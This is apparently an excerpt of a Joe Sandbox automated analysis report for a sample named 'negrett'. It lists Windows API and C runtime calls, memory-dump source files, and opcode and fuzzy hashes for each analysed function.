                                                • Source File: 00000005.00000002.774464819.0000000000B11000.00000020.00000001.01000000.00000004.sdmp, Offset: 00B10000, based on PE: true
                                                • Associated: 00000005.00000002.774460130.0000000000B10000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.774477735.0000000000BAC000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.774477735.0000000000BD2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.774497134.0000000000BDC000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.774500900.0000000000BE4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_b10000_negrett.jbxd
                                                Similarity
                                                • API ID: CodeInfoPageValid
                                                • String ID:
                                                • API String ID: 546120528-0
                                                • Opcode ID: 53fce6cc97717cb8ebef4c8b7d22460305b8876870603369e49c95b50eb218a5
                                                • Instruction ID: 010a27fcab833eac11382f7c3d246ecc4612a4a54e1535b69267f0b663f25470
                                                • Opcode Fuzzy Hash: 53fce6cc97717cb8ebef4c8b7d22460305b8876870603369e49c95b50eb218a5
                                                • Instruction Fuzzy Hash: C7511370E012059FDB609F75C8C16BABFE5EF41B10F1480EED09A8B152E7359A41EBD0
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                  • Part of subcall function 00B42D74: GetLastError.KERNEL32(?,?,00B45686,00B53CD6,?,00000000,?,00B45B6A,?,?,?,?,?,00B3E6D1,?,00BD8A48), ref: 00B42D78
                                                  • Part of subcall function 00B42D74: _free.LIBCMT ref: 00B42DAB
                                                  • Part of subcall function 00B42D74: SetLastError.KERNEL32(00000000,?,?,?,?,00B3E6D1,?,00BD8A48,00000010,00B14F4A,?,?,00000000,00B53CD6), ref: 00B42DEC
                                                  • Part of subcall function 00B42D74: _abort.LIBCMT ref: 00B42DF2
                                                  • Part of subcall function 00B4CADA: _abort.LIBCMT ref: 00B4CB0C
                                                  • Part of subcall function 00B4CADA: _free.LIBCMT ref: 00B4CB40
                                                  • Part of subcall function 00B4C74F: GetOEMCP.KERNEL32(00000000), ref: 00B4C77A
                                                • _free.LIBCMT ref: 00B4CA33
                                                • _free.LIBCMT ref: 00B4CA69
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.774464819.0000000000B11000.00000020.00000001.01000000.00000004.sdmp, Offset: 00B10000, based on PE: true
                                                • Associated: 00000005.00000002.774460130.0000000000B10000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.774477735.0000000000BAC000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.774477735.0000000000BD2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.774497134.0000000000BDC000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.774500900.0000000000BE4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_b10000_negrett.jbxd
                                                Similarity
                                                • API ID: _free$ErrorLast_abort
                                                • String ID:
                                                • API String ID: 2991157371-0
                                                • Opcode ID: c94beb6fb7a58aada962c81cb8a9a066e9561675f9c1a7f8485913665554a62d
                                                • Instruction ID: be782592131d2640583ca358600b3b88ff4c5f4afa59882c22ad9d0e47c7a5eb
                                                • Opcode Fuzzy Hash: c94beb6fb7a58aada962c81cb8a9a066e9561675f9c1a7f8485913665554a62d
                                                • Instruction Fuzzy Hash: 7D31A43190510CAFDB51EB69D441BA9BFF5EF40724F2501DAF4049B2A2EB315F41EB50
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • GetProcAddress.KERNEL32(00000000,00B11129,00000000,00000000,00000000,?,00B4328B,00000006,FlsSetValue,00BB2290,FlsSetValue,00000000,00000364,?,00B42E46,00000000), ref: 00B43037
                                                • __crt_fast_encode_pointer.LIBVCRUNTIME ref: 00B43044
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.774464819.0000000000B11000.00000020.00000001.01000000.00000004.sdmp, Offset: 00B10000, based on PE: true
                                                • Associated: 00000005.00000002.774460130.0000000000B10000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.774477735.0000000000BAC000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.774477735.0000000000BD2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.774497134.0000000000BDC000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.774500900.0000000000BE4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_b10000_negrett.jbxd
                                                Similarity
                                                • API ID: AddressProc__crt_fast_encode_pointer
                                                • String ID:
                                                • API String ID: 2279764990-0
                                                • Opcode ID: 58690981b4ebca23a81c3e32c18f25ea96813e4a6e0d067b2eea6f2763b1a701
                                                • Instruction ID: 6718dc57749f89ed1641e176a24dfc65e9d19bb11df9bb0893ec2ec4a7c1870e
                                                • Opcode Fuzzy Hash: 58690981b4ebca23a81c3e32c18f25ea96813e4a6e0d067b2eea6f2763b1a701
                                                • Instruction Fuzzy Hash: 3711C433A011219B9B329E19EC90A5AB7D5DB80B6071A03A0F915EB398DB31DF01E7D1
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • CreateFileW.KERNEL32(?,80000000,00000007,00000000,00000003,00000080,00000000), ref: 00B15773
                                                • CreateFileW.KERNEL32(?,C0000000,00000007,00000000,00000004,00000080,00000000), ref: 00B54052
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.774464819.0000000000B11000.00000020.00000001.01000000.00000004.sdmp, Offset: 00B10000, based on PE: true
                                                • Associated: 00000005.00000002.774460130.0000000000B10000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.774477735.0000000000BAC000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.774477735.0000000000BD2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.774497134.0000000000BDC000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.774500900.0000000000BE4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_b10000_negrett.jbxd
                                                Similarity
                                                • API ID: CreateFile
                                                • String ID:
                                                • API String ID: 823142352-0
                                                • Opcode ID: b70a372a4402a61ca881296616bda355dd12045efc1a8dd23a6b8999b54762ad
                                                • Instruction ID: ef47e52dcd5989541731a16798e09e85fa0306fc7c33608f16dfcc183c21f35d
                                                • Opcode Fuzzy Hash: b70a372a4402a61ca881296616bda355dd12045efc1a8dd23a6b8999b54762ad
                                                • Instruction Fuzzy Hash: 10014031245225F6E3314A2ADC0FF977F98EF427B5F148250BA9C6A1E0CBB45894CB90
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                  • Part of subcall function 00B33600: try_get_function.LIBVCRUNTIME ref: 00B33615
                                                • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 00B33432
                                                • ___vcrt_uninitialize_ptd.LIBVCRUNTIME ref: 00B3343D
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.774464819.0000000000B11000.00000020.00000001.01000000.00000004.sdmp, Offset: 00B10000, based on PE: true
                                                • Associated: 00000005.00000002.774460130.0000000000B10000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.774477735.0000000000BAC000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.774477735.0000000000BD2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.774497134.0000000000BDC000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.774500900.0000000000BE4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_b10000_negrett.jbxd
                                                Similarity
                                                • API ID: Value___vcrt____vcrt_uninitialize_ptdtry_get_function
                                                • String ID:
                                                • API String ID: 806969131-0
                                                • Opcode ID: 0d9f8ceffdca57bfcc5c442821aad698c527ba70e12d3f570c670ddc81dd90d9
                                                • Instruction ID: dc0c3c37ebfaa4b690e27c8230d297d0706a6b0c2342b5b1f66c59c47fdaa533
                                                • Opcode Fuzzy Hash: 0d9f8ceffdca57bfcc5c442821aad698c527ba70e12d3f570c670ddc81dd90d9
                                                • Instruction Fuzzy Hash: DDD0A930648302A81D062BB538A305B37C08801F74FB062EAE420CA3D2EF2483412416
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • __Init_thread_footer.LIBCMT ref: 00B1BB4E
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.774464819.0000000000B11000.00000020.00000001.01000000.00000004.sdmp, Offset: 00B10000, based on PE: true
                                                • Associated: 00000005.00000002.774460130.0000000000B10000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.774477735.0000000000BAC000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.774477735.0000000000BD2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.774497134.0000000000BDC000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.774500900.0000000000BE4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_b10000_negrett.jbxd
                                                Similarity
                                                • API ID: Init_thread_footer
                                                • String ID:
                                                • API String ID: 1385522511-0
                                                • Opcode ID: 66bb0afd5c1e51cd909cf51c761b980752d54ac29378cc01d8d5dd139743fe10
                                                • Instruction ID: d7c93ac73f58a13337c6e49cc7f0a141109515c85ed872cb382763778d1ae7e5
                                                • Opcode Fuzzy Hash: 66bb0afd5c1e51cd909cf51c761b980752d54ac29378cc01d8d5dd139743fe10
                                                • Instruction Fuzzy Hash: CF32BB31A04209DFDB24DF55C894EBEB7F9EF48340F5480D9E905AB2A1C778AD82CB91
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                  • Part of subcall function 00B14E90: LoadLibraryA.KERNEL32(kernel32.dll), ref: 00B14E9C
                                                  • Part of subcall function 00B14E90: GetProcAddress.KERNEL32(00000000,Wow64DisableWow64FsRedirection,?,?,00B14EDD,?,00BE1418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00B14EAE
                                                  • Part of subcall function 00B14E90: FreeLibrary.KERNEL32(00000000,?,?,00B14EDD,?,00BE1418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00B14EC0
                                                • LoadLibraryExW.KERNEL32(?,00000000,00000002,?,00BE1418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00B14EFD
                                                  • Part of subcall function 00B14E59: LoadLibraryA.KERNEL32(kernel32.dll), ref: 00B14E62
                                                  • Part of subcall function 00B14E59: GetProcAddress.KERNEL32(00000000,Wow64RevertWow64FsRedirection,?,?,00B53CDE,?,00BE1418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00B14E74
                                                  • Part of subcall function 00B14E59: FreeLibrary.KERNEL32(00000000,?,?,00B53CDE,?,00BE1418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00B14E87
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.774464819.0000000000B11000.00000020.00000001.01000000.00000004.sdmp, Offset: 00B10000, based on PE: true
                                                • Associated: 00000005.00000002.774460130.0000000000B10000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.774477735.0000000000BAC000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.774477735.0000000000BD2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.774497134.0000000000BDC000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.774500900.0000000000BE4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_b10000_negrett.jbxd
                                                Similarity
                                                • API ID: Library$Load$AddressFreeProc
                                                • String ID:
                                                • API String ID: 2632591731-0
                                                • Opcode ID: 1986a7685f46748e8d4e9eb0c12754f5e1c47134c8ac8ec051779db27e3b936d
                                                • Instruction ID: bfe4e256cafaa043899b29dd22e2fa7bd0c6592eee096be754548dd4460d80ee
                                                • Opcode Fuzzy Hash: 1986a7685f46748e8d4e9eb0c12754f5e1c47134c8ac8ec051779db27e3b936d
                                                • Instruction Fuzzy Hash: D511C432600305AACB24AB64DC02FED77E5AF44B11FA044A9F546AA2D1DF719A85D750
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.774464819.0000000000B11000.00000020.00000001.01000000.00000004.sdmp, Offset: 00B10000, based on PE: true
                                                • Associated: 00000005.00000002.774460130.0000000000B10000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.774477735.0000000000BAC000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.774477735.0000000000BD2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.774497134.0000000000BDC000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.774500900.0000000000BE4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_b10000_negrett.jbxd
                                                Similarity
                                                • API ID: __wsopen_s
                                                • String ID:
                                                • API String ID: 3347428461-0
                                                • Opcode ID: 9dc5747029924e6815e5f630115e7844c0a76f4172451e2720142734a62be628
                                                • Instruction ID: 0c3cbb7945b6f631afe3bd86a6006d45478cfda2d810ab622a3765270ade11d6
                                                • Opcode Fuzzy Hash: 9dc5747029924e6815e5f630115e7844c0a76f4172451e2720142734a62be628
                                                • Instruction Fuzzy Hash: DA11187590410AAFCF05DF58E94199E7BF5EF48314F144199FC08AB312DA31DA11DBA5
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • ReadFile.KERNEL32(?,?,00010000,00000000,00000000), ref: 00B19A9C
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.774464819.0000000000B11000.00000020.00000001.01000000.00000004.sdmp, Offset: 00B10000, based on PE: true
                                                • Associated: 00000005.00000002.774460130.0000000000B10000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.774477735.0000000000BAC000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.774477735.0000000000BD2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.774497134.0000000000BDC000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.774500900.0000000000BE4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_b10000_negrett.jbxd
                                                Similarity
                                                • API ID: FileRead
                                                • String ID:
                                                • API String ID: 2738559852-0
                                                • Opcode ID: 0ed6873d112ec3d68deb7bb8c75f1fd3ced769c21c6166ebb080d3f3d1046383
                                                • Instruction ID: 47bbf7a1d999171b0d9c6359e0610e6b2b1c4086c1dbb6e76ee9e2fc8931c4b3
                                                • Opcode Fuzzy Hash: 0ed6873d112ec3d68deb7bb8c75f1fd3ced769c21c6166ebb080d3f3d1046383
                                                • Instruction Fuzzy Hash: E51166312047409FD7248E06C890BA6B7F8EF44360F50C46EE9AB8BA50C771B889CB60
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                  • Part of subcall function 00B44C7D: RtlAllocateHeap.NTDLL(00000008,00B11129,00000000,?,00B42E29,00000001,00000364,?,?,?,00B3F2DE,00B43863,00BE1444,?,00B2FDF5,?), ref: 00B44CBE
                                                • _free.LIBCMT ref: 00B4506C
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.774464819.0000000000B11000.00000020.00000001.01000000.00000004.sdmp, Offset: 00B10000, based on PE: true
                                                • Associated: 00000005.00000002.774460130.0000000000B10000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.774477735.0000000000BAC000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.774477735.0000000000BD2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.774497134.0000000000BDC000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.774500900.0000000000BE4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_b10000_negrett.jbxd
                                                Similarity
                                                • API ID: AllocateHeap_free
                                                • String ID:
                                                • API String ID: 614378929-0
                                                • Opcode ID: 9ba45ce058d1080761d5af908226540236078fd1fc19e2e0238d0ad147f07c6e
                                                • Instruction ID: ed3cf725221b92780c31c7abc6162e647d481df8396b1290cc78d9ef3d290f56
                                                • Opcode Fuzzy Hash: 9ba45ce058d1080761d5af908226540236078fd1fc19e2e0238d0ad147f07c6e
                                                • Instruction Fuzzy Hash: 11012B76204B055BE3318F599881A5AFBE9FB85370F65055DE18483381E6306A05C674
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.774464819.0000000000B11000.00000020.00000001.01000000.00000004.sdmp, Offset: 00B10000, based on PE: true
                                                • Associated: 00000005.00000002.774460130.0000000000B10000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.774477735.0000000000BAC000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.774477735.0000000000BD2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.774497134.0000000000BDC000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.774500900.0000000000BE4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_b10000_negrett.jbxd
                                                Similarity
                                                • API ID: __alldvrm
                                                • String ID:
                                                • API String ID: 65215352-0
                                                • Opcode ID: a845a44d02681bb2d7e28a9375752329a8500175178d90c20446a2b2f7487fa6
                                                • Instruction ID: 87a9183e00852ba5bdfc2ccf6e2bab89fead0c263ee6b18e7f5f661870cadb08
                                                • Opcode Fuzzy Hash: a845a44d02681bb2d7e28a9375752329a8500175178d90c20446a2b2f7487fa6
                                                • Instruction Fuzzy Hash: 7101B571910308AFEB24DFA4CC457AE77E8EB44325F6085AAF41597240D631EE00D760
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Memory Dump Source
                                                • Source File: 00000005.00000002.774464819.0000000000B11000.00000020.00000001.01000000.00000004.sdmp, Offset: 00B10000, based on PE: true
                                                • Associated: 00000005.00000002.774460130.0000000000B10000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.774477735.0000000000BAC000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.774477735.0000000000BD2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.774497134.0000000000BDC000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.774500900.0000000000BE4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_b10000_negrett.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: d6c69ec2a70ac845cc05b5f137181c3f07394ab8b33ef369e8c7ef627d5c9574
                                                • Instruction ID: d0085e16f86f4a9f690bb82a997f1b12aad4cd0c5faff570af9fd752e3dced5a
                                                • Opcode Fuzzy Hash: d6c69ec2a70ac845cc05b5f137181c3f07394ab8b33ef369e8c7ef627d5c9574
                                                • Instruction Fuzzy Hash: CBF02832510A14A7DB313A6A9C06B5B33D8DF52335F3007EAF830932D2CB70D90596A6
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • RtlAllocateHeap.NTDLL(00000008,00B11129,00000000,?,00B42E29,00000001,00000364,?,?,?,00B3F2DE,00B43863,00BE1444,?,00B2FDF5,?), ref: 00B44CBE
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.774464819.0000000000B11000.00000020.00000001.01000000.00000004.sdmp, Offset: 00B10000, based on PE: true
                                                • Associated: 00000005.00000002.774460130.0000000000B10000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.774477735.0000000000BAC000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.774477735.0000000000BD2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.774497134.0000000000BDC000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.774500900.0000000000BE4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_b10000_negrett.jbxd
                                                Similarity
                                                • API ID: AllocateHeap
                                                • String ID:
                                                • API String ID: 1279760036-0
                                                • Opcode ID: 58201c557a1cde6b34091fb69f954c7a02335ba4413bec0a507f6f17631d96d8
                                                • Instruction ID: 330e58c588944f77c1f2438e9b213c9de066b37258a220867e4a5c3524d1efaa
                                                • Opcode Fuzzy Hash: 58201c557a1cde6b34091fb69f954c7a02335ba4413bec0a507f6f17631d96d8
                                                • Instruction Fuzzy Hash: 34F0E931602224A7DB215F62AC85B5B37C8FF417A1F2C4191BC19AB182CF70DA2466E0
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • RtlAllocateHeap.NTDLL(00000000,?,00BE1444,?,00B2FDF5,?,?,00B1A976,00000010,00BE1440,00B113FC,?,00B113C6,?,00B11129), ref: 00B43852
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.774464819.0000000000B11000.00000020.00000001.01000000.00000004.sdmp, Offset: 00B10000, based on PE: true
                                                • Associated: 00000005.00000002.774460130.0000000000B10000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.774477735.0000000000BAC000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.774477735.0000000000BD2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.774497134.0000000000BDC000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.774500900.0000000000BE4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_b10000_negrett.jbxd
                                                Similarity
                                                • API ID: AllocateHeap
                                                • String ID:
                                                • API String ID: 1279760036-0
                                                • Opcode ID: 873e1073dd439b53423e6d98fe998d39407a77139d93db2bca0296783c12f3ea
                                                • Instruction ID: 9f85a92792ef5fab58bf51c09117c5beb18fcaf293d5b5ff50142628f293905a
                                                • Opcode Fuzzy Hash: 873e1073dd439b53423e6d98fe998d39407a77139d93db2bca0296783c12f3ea
                                                • Instruction Fuzzy Hash: BBE0E531100224A6D62126679C01B9BB7C9EB42FB0F2D00A0BC1596480EB21EF01A7E0
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • FreeLibrary.KERNEL32(?,?,00BE1418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00B14F6D
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.774464819.0000000000B11000.00000020.00000001.01000000.00000004.sdmp, Offset: 00B10000, based on PE: true
                                                • Associated: 00000005.00000002.774460130.0000000000B10000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.774477735.0000000000BAC000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.774477735.0000000000BD2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.774497134.0000000000BDC000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.774500900.0000000000BE4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_b10000_negrett.jbxd
                                                Similarity
                                                • API ID: FreeLibrary
                                                • String ID:
                                                • API String ID: 3664257935-0
                                                • Opcode ID: 24764a89bc0703f9f1dbb99d13bc27d95e1be168072114bd8f86bff55ed81eed
                                                • Instruction ID: 86a3ac5cd2b088c97943dede614df0c388151c4c7864d8c86620d18b714769e8
                                                • Opcode Fuzzy Hash: 24764a89bc0703f9f1dbb99d13bc27d95e1be168072114bd8f86bff55ed81eed
                                                • Instruction Fuzzy Hash: 6CF03971105752CFDB349F64D4908A6BBE4EF1632936489BEE1EE87621CB319889DF10
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • GetLongPathNameW.KERNEL32 ref: 00B12DC4
                                                  • Part of subcall function 00B16B57: _wcslen.LIBCMT ref: 00B16B6A
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.774464819.0000000000B11000.00000020.00000001.01000000.00000004.sdmp, Offset: 00B10000, based on PE: true
                                                • Associated: 00000005.00000002.774460130.0000000000B10000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.774477735.0000000000BAC000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.774477735.0000000000BD2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.774497134.0000000000BDC000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.774500900.0000000000BE4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_b10000_negrett.jbxd
                                                Similarity
                                                • API ID: LongNamePath_wcslen
                                                • String ID:
                                                • API String ID: 541455249-0
                                                • Opcode ID: 7808a2c2a165df0dcade1ba79e7e98f7c2bc896f84d2b620b236946e9e145096
                                                • Instruction ID: a360881c5e9c49d1dba281189215fddf5558c1ae744a967bf764c7a959faabc8
                                                • Opcode Fuzzy Hash: 7808a2c2a165df0dcade1ba79e7e98f7c2bc896f84d2b620b236946e9e145096
                                                • Instruction Fuzzy Hash: 1CE0C272A042246BCB20A6989C06FEA77EDDFC9790F0500F1FD09E7248DA60AD848690
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                  • Part of subcall function 00B13837: Shell_NotifyIconW.SHELL32(00000000,?), ref: 00B13908
                                                  • Part of subcall function 00B1D730: GetInputState.USER32 ref: 00B1D807
                                                • SetCurrentDirectoryW.KERNEL32(?), ref: 00B12B6B
                                                  • Part of subcall function 00B130F2: Shell_NotifyIconW.SHELL32(00000002,?), ref: 00B1314E
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.774464819.0000000000B11000.00000020.00000001.01000000.00000004.sdmp, Offset: 00B10000, based on PE: true
                                                • Associated: 00000005.00000002.774460130.0000000000B10000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.774477735.0000000000BAC000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.774477735.0000000000BD2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.774497134.0000000000BDC000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.774500900.0000000000BE4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_b10000_negrett.jbxd
                                                Similarity
                                                • API ID: IconNotifyShell_$CurrentDirectoryInputState
                                                • String ID:
                                                • API String ID: 3667716007-0
                                                • Opcode ID: 475b1d7151585cce592c95d9e60395e7fea369d353a08976590081ec1317b957
                                                • Instruction ID: 64f23f353806beece9baa7f5d256696f33c58090989e85863395a8b495cf0079
                                                • Opcode Fuzzy Hash: 475b1d7151585cce592c95d9e60395e7fea369d353a08976590081ec1317b957
                                                • Instruction Fuzzy Hash: 7AE0263230428403CA04BB34A8525EDA7E98BD2751FC008BEF142472A2DF308AC94352
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.774464819.0000000000B11000.00000020.00000001.01000000.00000004.sdmp, Offset: 00B10000, based on PE: true
                                                • Associated: 00000005.00000002.774460130.0000000000B10000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.774477735.0000000000BAC000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.774477735.0000000000BD2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.774497134.0000000000BDC000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.774500900.0000000000BE4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_b10000_negrett.jbxd
                                                Similarity
                                                • API ID: __fread_nolock
